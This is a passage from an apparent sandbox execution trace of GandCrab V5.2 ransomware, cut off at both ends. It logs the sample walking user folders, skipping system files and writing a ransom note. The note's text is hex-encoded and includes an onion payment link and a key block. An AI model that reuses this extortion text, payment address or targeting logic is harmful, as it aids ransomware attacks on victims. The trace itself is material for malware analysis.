flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.150] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 126 [0078.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 117 [0078.150] lstrlenW (lpString=".txt") returned 4 [0078.150] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.151] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0078.151] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0078.151] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.151] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 117 [0078.151] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 117 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0078.151] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0078.151] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.151] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0078.152] FindClose (in: hFindFile=0x5039b8 | out: hFindFile=0x5039b8) returned 1 [0078.153] CloseHandle (hObject=0x2dc) returned 1 [0078.153] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0078.153] lstrcmpW (lpString1="SmartArt Graphics", lpString2=".") returned 1 [0078.153] lstrcmpW (lpString1="SmartArt Graphics", lpString2="..") returned 1 [0078.153] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="SmartArt Graphics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics" [0078.153] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\" [0078.153] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0078.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.155] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.155] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.155] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.155] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\\\TITWMVJL-DECRYPT.txt") returned 120 [0078.155] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0078.156] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4